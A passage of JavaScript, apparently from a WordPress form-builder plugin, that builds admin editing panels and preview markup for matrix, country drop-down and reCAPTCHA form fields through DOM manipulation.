		el_rows_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_rows_add.style.cssText = 'cursor:pointer;';
		el_rows_add.setAttribute("title", 'add');
		el_rows_add.setAttribute("onClick", "add_to_matrix('rows',  "+i+")");
				
	var el_columns_label = document.createElement('label');
		el_columns_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
		el_columns_label.innerHTML = "Columns ";
	var el_columns_add = document.createElement('img');
		el_columns_add.setAttribute("id", "el_columns_add");
		el_columns_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_columns_add.style.cssText = 'cursor:pointer;';
		el_columns_add.setAttribute("title", 'add');
		el_columns_add.setAttribute("onClick", "add_to_matrix('columns',  "+i+")");			
	
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
	

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
    edit_main_td3.appendChild(el_input_type_label);
	
	el_input_type1.appendChild(Radio_Button);
	el_input_type2.appendChild(Check_Box);
	el_input_type3.appendChild(Text_Box);
	el_input_type4.appendChild(Drop_Down);
	
	el_input_type.appendChild(el_input_type1);
	el_input_type.appendChild(el_input_type2);
	el_input_type.appendChild(el_input_type3);
	el_input_type.appendChild(el_input_type4);
	
	edit_main_td3_1.appendChild(el_input_type);
	
	edit_main_td10.appendChild(el_textbox_size_label);
	edit_main_td10_1.appendChild(el_textbox_size);
	
	edit_main_td4.appendChild(el_rows_label);
	edit_main_td4_1.appendChild(el_rows_add);
	
	edit_main_td5.appendChild(el_columns_label);
	edit_main_td5_1.appendChild(el_columns_add);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	

	edit_main_td7.appendChild(el_style_label);
	edit_main_td7_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br6);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	
	n=w_rows.length;
	for(k=1; k<n; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "brrows"+k);
			
		var el_rows = document.createElement('input');
			el_rows.setAttribute("id", "el_rows"+k);
			el_rows.setAttribute("type", "text");
			el_rows.setAttribute("value", w_rows[k]);
			el_rows.setAttribute("class", "fm-field-choice");
			el_rows.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp"+k+"_0', this.value); change_in_value('"+i+"_label_elementform_id_temp"+k+"_0', this.value)");
	
		var el_rows_remove = document.createElement('img');
			el_rows_remove.setAttribute("id", "el_rows"+k+"_remove");
			el_rows_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');		
			el_rows_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_rows_remove.setAttribute("align", 'top');
			el_rows_remove.setAttribute("onClick", "remove_rowcols("+k+","+i+",'rows')");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_rows);
		edit_main_td4.appendChild(el_rows_remove);
	
	}
	
	m=w_columns.length;
	for(k=1; k<m; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "brcolumns"+k);
			
		var el_columns = document.createElement('input');
			el_columns.setAttribute("id", "el_columns"+k);
			el_columns.setAttribute("type", "text");
			el_columns.setAttribute("value", w_columns[k]);
			el_columns.setAttribute("class", "fm-field-choice");
			el_columns.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp0_"+k+"', this.value); change_in_value('"+i+"_label_elementform_id_temp0_"+k+"', this.value)");
	
		var el_columns_remove = document.createElement('img');
			el_columns_remove.setAttribute("id", "el_columns"+k+"_remove");
			el_columns_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');		
			el_columns_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_columns_remove.setAttribute("align", 'top');
			el_columns_remove.setAttribute("onClick", "remove_rowcols("+k+","+i+",'columns')");
			
		edit_main_td5.appendChild(br);
		edit_main_td5.appendChild(el_columns);
		edit_main_td5.appendChild(el_columns_remove);
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
    edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr10.appendChild(edit_main_td10);
    edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);	
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	
	edit_div.appendChild(edit_main_table);
	t.appendChild(edit_div);
	element='input';	
	type='matrix'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_matrix");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_input_type = document.createElement("input");
            adding_input_type.setAttribute("type", "hidden");
            adding_input_type.setAttribute("value", w_field_input_type);
            adding_input_type.setAttribute("name", i+"_input_typeform_id_temp");
            adding_input_type.setAttribute("id", i+"_input_typeform_id_temp");
	
	var adding_textbox_size = document.createElement("input");
		adding_textbox_size.setAttribute("type", "hidden");
		adding_textbox_size.setAttribute("value", w_textbox_size);
		adding_textbox_size.setAttribute("name", i+"_textbox_sizeform_id_temp");
		adding_textbox_size.setAttribute("id", i+"_textbox_sizeform_id_temp");
		
   var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
		
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width= w_field_label_size+'px';
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');

	var table_little_t = document.createElement('div');
	    table_little_t.setAttribute("id", i+"_elementform_id_temp");
		table_little_t.style.display="table";
		
	var table_little = document.createElement('div');
		table_little.setAttribute("id", i+"_table_little");
		table_little.style.display="table-row-group";
	
	table_little_t.appendChild(table_little);


	
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");

	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";
	
	var main_td  = document.getElementById('show_table');
	
		div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
      	div_element.appendChild(adding_input_type);
		div_element.appendChild(adding_textbox_size);
      	div_element.appendChild(table_little_t);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      	div.appendChild(div_field);
       	div.appendChild(br3);
      	main_td.appendChild(div);
	
		
	if(w_field_label_pos=="top")
				label_top(i);
				
	
change_class(w_class, i);
refresh_attr(i, 'type_matrix');
refresh_matrix(i);
}

function change_input_type(id, value)
{
	document.getElementById(id+"_input_typeform_id_temp").value = value;
}


function type_country(i, w_field_label, w_field_label_size, w_countries, w_field_label_pos, w_size, w_required, w_class, w_attr_name, w_attr_value) {
	
	document.getElementById("element_type").value="type_country";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
			
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
      				
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');	
		  
	var el_label_label = document.createElement('label');
	    el_label_label.setAttribute("class", "fm-field-label");
			        el_label_label.setAttribute("for", "edit_for_label");
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
	
	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
		
	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
		el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
		
	var el_edit_list = document.createElement('a');
	    el_edit_list.style.cssText ="color:#000; font-weight:bold; font-size: 11px; font-style:italic; cursor:pointer";
		el_edit_list.innerHTML = "Edit country list";
		el_edit_list.setAttribute("onclick", "tb_show('', 'admin-ajax.php?action=fromeditcountryinpopup&field_id="+i+"&width=530&height=370&TB_iframe=1')");
		el_edit_list.setAttribute("class","thickbox-preview");
		
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
		
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");           
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
		br3.setAttribute("id", "br1");
	var br4 = document.createElement('br');
		br4.setAttribute("id", "br2");
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_td7.appendChild(el_edit_list);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_country");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
			div_element.style.width=w_field_label_size+"px";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");


      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
		
	var table_little = document.createElement('div');
           	table_little.setAttribute("id", i+"_table_little");
			table_little.style.display="table";
			
      	var tr_little1 = document.createElement('div');
	        tr_little1.setAttribute("id", i+"_element_tr1");
			tr_little1.style.display="table-row";
		
      	var tr_little2 = document.createElement('div');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			tr_little2.style.display="table-row";
			
      	var td_little1 = document.createElement('div');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			td_little1.style.display="table-cell";
			
      	var td_little2 = document.createElement('div');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			td_little2.style.display="table-cell";
			

      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
			
	var select_ = document.createElement('select');
		select_.setAttribute("id", i+"_elementform_id_temp");
		select_.setAttribute("name", i+"_elementform_id_temp");
		select_.style.cssText = "width:"+w_size+"px";
				
		for(r=0;r<w_countries.length;r++)
		{
		var option_ = document.createElement('option');
			option_.setAttribute("value", w_countries[r]);
			option_.innerHTML=w_countries[r];
		select_.appendChild(option_);
		}
		
      	var main_td  = document.getElementById('show_table');
	
      
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	
	div_element.appendChild(adding_required);
	div_element.appendChild(select_);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
      
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
	
	if(w_field_label_pos=="top")
		label_top(i);
	
	change_class(w_class, i);
	refresh_attr(i, 'type_text');

//	fm_popup();
}


function type_recaptcha(i,w_field_label, w_field_label_size, w_field_label_pos, w_public, w_private, w_theme, w_class, w_attr_name, w_attr_value){
	
    document.getElementById("element_type").value="type_recaptcha";
	delete_last_child();	
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9 = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_public_label = document.createElement('label');
		el_public_label.setAttribute("for", "public_key");
		el_public_label.setAttribute("class", "fm-field-label");
		el_public_label.innerHTML = "Keys";
	
	var el_public_link = document.createElement('a');
        el_public_link.setAttribute("href", admin_url +"?page=goptions_fmc");
		el_public_link.setAttribute("class", "fm-field-recaptcha-label");
		el_public_link.setAttribute("target", "_blank");
		el_public_link.innerHTML ='To set up recaptcha keys click here';


	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");            
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_recaptcha')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
